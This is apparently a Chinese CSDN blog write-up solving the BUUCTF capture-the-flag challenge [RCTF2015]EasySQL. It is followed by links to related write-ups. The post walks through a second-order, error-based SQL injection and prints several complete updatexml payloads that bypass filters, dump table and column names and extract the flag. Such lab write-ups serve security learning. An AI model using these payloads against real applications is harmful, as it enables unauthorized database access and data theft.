[RCTF2015]EasySQL

最新推荐文章于 2024-09-15 08:03:51 发布
最新推荐文章于 2024-09-15 08:03:51 发布
阅读量316 收藏
点赞数 12
分类专栏: BUUctf web 文章标签: 数据库 web安全 经验分享 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140415926
版权

在这里插入图片描述
直接登录没有反应
然后注册的时候直接随便注册一个账号,登录之后没发现有啥提示除了url有个title
然后发现可以修改密码
在这里插入图片描述
但是还是没有我们想要的hint,重新开靶机注册账号admin',还是没有用,继续刷靶机,注册admin"
在这里插入图片描述
修改密码出现了报错,报错注入开始
我尝试在改密码界面注入,但是没有任何回显
仔细想想与我们之前做的不同的应该是注册页面

admin' ->admin" ->报错注入语句,用引号闭合,那么我们是不是可以得到信息

成功

-1"||updatexml(1,concat(0x7e,database(),0x7e),3)#

在这里插入图片描述

-1"||updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)(limit)4,1),0x7e),3)#
这个应该是没有写错的,但是不能成功     
很多查行数的都被过滤了mid limit right left
那估计就是不让查库名,我们直接爆表吧
-1"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),3)#

在这里插入图片描述

-1"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e),3)#
这个列名是我猜的后面知道原来可以这样绕过
real_flag_1s_here

-1"||updatexml(1,concat(1,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1),3)#

在这里插入图片描述
查flag的时候发现有很多其他的数据那么这里就需要使用到一个查找

-1"||updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),1),3)#
flag{c7dc7860-822f-4d21-b505-c5

-1"||updatexml(1,concat(1,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1),3)#
}dcf50d62655c-505b-12d4-f228-068

def reverse_string(input_string):
    reversed_string = input_string[::-1]
    return reversed_string

# 测试字符串
input_str = "}dcf50d62655c-505b-12d4-f228-068"

# 调用函数并输出结果
reversed_str = reverse_string(input_str)
print(reversed_str)

flag{c7dc7860-822f-4d21-b505-c55626d05fcd}
baozongwi
关注
专栏目录
buu-[RCTF2015]EasySQL
qaq517384的博客
10-11 328
打开环境有两个选项 对注册的三个输入简单fuzz一下 除了过滤的基本都能用作用户名,包括反斜杠,单双引号 在正常登陆后,改密码时就可以看到由用户名不合法导致的报错 由报错语句:’"’" and pwd=‘c4ca4238a0b923820dcc509a6f75849b’’ 得到原本的sql应该是 update table set username="$username" and password='$newpassword' 这里就可以构造一个有关于报错注入的二次注入 通过我们构造的sql语句,在改
[初级]sql注入之二次注入[RCTF2015]EasySQL 1(报错注入,爆库,表)
BlingZeng的博客
02-09 3805
BUUCTF的[RCTF2015]EasySQL1 题目的解题文章,如果有兴趣可以一起探讨一下。使用的方法是二次注入,报错注入,爆库、表等手段
[RCTF2015]EasySQL 1
m0_62879498的博客
05-21 1464
[RCTF2015]EasySQL 1 进入环境,发现注册页面和登录页面 我们尝试进行注册admin,页面回显用户存在,第一时间就想到了二次注入。 注册 admin"#,登录后更改密码,成功。登录admin ,发现和普通有用户没有区别。 之后就是寻找注入点,只有登陆界面,注册界面和changepwd界面可能存在存在sql注入。 我们知道二次注入主要是 插入恶意数据和引用恶意数据。 注册界面主要是进行一个插入数据,肯定需要一个界面进行恶意数据的引用。 我们在注册界面输入恶意数据分别进行尝试 尝试后发现,登
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1204
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.报错注入用法5.二次注入。
[RCTF2015]EasySQL 二次注入 regexp指定字段 reverse逆序输出
m0_64180167的博客
09-30 185
第一眼没看出来 我以为是伪造管理员就先去测试管理员账号去register.php注册 首先先注册一个自己的账号我喜欢用admin123发现里面存在修改密码的内容 那么肯定链接到数据库了题目又提示是sql那我们看看能不能修改管理员密码首先我们猜测闭合通过用户名admin"然后点击修改密码 进行修改密码发现报错了这里我们就可以先进行判断sql语句了那我们这里就很简单了 因为修改成功没有回显 报错有回显我们直接报错注入即可发现报错了 肯定存在过滤那我们fuzz一下。
BUUCTF:[RCTF2015]EasySQL
末初的CSDN博客
03-29 3849
BUUCTF:[RCTF2015]EasySQL 参考:https://www.cnblogs.com/peri0d/p/11599643.html 先注册一个用户 在注册的时候,fuzz测试发现在username和email中过滤了以下字符: @ or and space(空格) substr mid left right handle 没有源码慢慢测试....... 登录,发现还有个改密...
[wp][RCTF2015]EasySQL
小飒的博客
07-05 442
有修改密码怀疑是2次注入 admin被注册 sqli-lab24关中遇到过二次注入 特地去看了下代码 一开始尝试admin’# 修改密码 admin还是登陆不上 使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化 试下报错注入 注册的时候发现有过滤 得到数据库名:web_sqli 得到表名article,flag,users 盲猜列名 flag 获得"~RCTF{Good job! But flag not her"疯了,只能试下别的表,希望不要是被我修改了的admin密码 real_
190409 逆向-RCTF2015(FlagSystem)
热门推荐
whklhhhh的博客
04-09 2万+
想起来前段时间搞了JEB3的泄露版,找了个安卓题来试试手 结果发现这题目也挺有意思的23333 提供的题目文件是一个二进制,十六进制查看器发现头部标着ANDROID BACKUP,显然就是个应用的备份文件了 查了一下可以通过abe.jar来解包,试了一下发现解出来的文件是乱码,毫无标志 于是找了一下文件解析,发现第三行为压缩标志位,源文件为0表示未压缩,于是将它改成1,再次解包,得到两个应用 看...
RCTF_2015_web500.rar
09-30
【标题】"RCTF_2015_web500.rar" 指的可能是一个在2015年RCTF(Redbud Cybersecurity Technology Challenge)网络安全竞赛中的Web类题目,难度级别可能是500分,暗示这道题目相对复杂。这种竞赛通常涉及网络安全、...
XCTF攻防世界题目upload(RCTF-2015)
daqiangdetianxia的博客
08-12 706
upload 信息搜集 dirsearch目录扫描,发现classes目录 然后进入classes目录,发现password.php user.php文件夹 中间件和服务器:Apache/2.4.7 (Ubuntu) 尝试 用sqlmap对登录和注册页面进行注入,发现不行。 注册后进行登录,发现有一个文件上传页面。可能是一个文件上传漏洞。 上传一句话木马,找不到上传后的文件夹,于是通过猜测上传文件夹名称,找不到,于是放弃文件上传漏洞。 文件上传后发现 ...
4.网络编程
weixin_45476535的博客
09-14 421
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1100
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
55 mysql 的登录认证流程
最新发布
970655147的专栏
09-15 788
这里我们来看一下 mysql 的认证的流程我们这里仅仅看 我们最常见的一个 认证的处理流程我们经常会登录的时候 碰到各种异常信息大概的流程是这样客户端和服务器建立连接之后, 服务器向客户端发送 salt然后 客户端根据 salt 将客户端传入的密码加密之后, 以及相关登录信息传递给服务器然后 服务器进行验证, 验证失败, 响应对应的错误信息给客户端服务器发送 salt 的信息如下客户端发送的认证请求如下服务器响应的认证失败信息如下。
110个oracle常用函数总结
m516387177的博客
09-12 800
nvl2 (expr1, expr2, expr3) ->expr1不为null,返回expr2;为null,返回expr3。nvl(expr1, expr2)->expr1为null,返回expr2;不为null,返回expr1。求最大值,all表示对所有的值求最大值,distinct表示对不同的值求最大值,相同的只取一次。求最小值,all表示对所有的值求最小值,distinct表示对不同的值求最小值,相同的只取一次。nullif (expr1, expr2) ->相等返回null,不等返回expr1。
PHP在现代Web开发中的高效应用与最佳实践
运维人生
09-13 988
我们将使用Laravel框架来构建一个简单的博客系统,该系统包括文章发布、编辑、查看和评论等功能。PHP作为一门成熟且强大的服务器端脚本语言,在现代Web开发中依然扮演着重要角色。通过遵循最佳实践、利用现代PHP版本的特性和成熟的框架与组件,开发者可以高效构建出稳定、安全、可扩展的Web应用。本文通过一个简单的博客系统案例,展示了PHP在实际项目中的应用方法和技巧,希望能为PHP开发者提供一些有益的参考和启发。
linux环境下手动安装mysql
weixin_45583482的博客
09-14 902
没想到兜兜转转这么些年,今天申请个云服务器用来搭建求生2服务器,先用mysql来测试,结果还是花了相当久的时间。基本所有单节点部署应用到linux环境,都三个流程:1 下载安装包2 解压修改配置文件3 运行启动脚本我们按这个流程来说我遇到并解决的问题 ,如果你在过程中遇到什么问题,也请先暂停你的启动流程,移步到最下面的内容,看看是否有和你遇到一样的问题,解决以后继续。
转行软件测试工程师经验总结
2402_84109700的博客
09-12 551
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。在测试理论方面,要熟悉常用的测试用例设计方法,理解不同测试类型的特点,掌握测试用例的基本格式,以及测试结束的标准。最终,我如愿以偿地加入了一家互联网公司,这里的办公环境优越,薪资也较之前的工作有所提升,使我心情愉悦。
关于新版本 tidb dashboard API 调用说明
TiDB 社区干货传送门
09-11 462
作者: WalterWj 原文来源: https://tidb.net/blog/d2d669b2 ...
mycat双主高可用架构部署-水评分表-范围分片配置
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
09-11 1270
mycat双主高可用架构部署-水评分表-范围分片配置
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值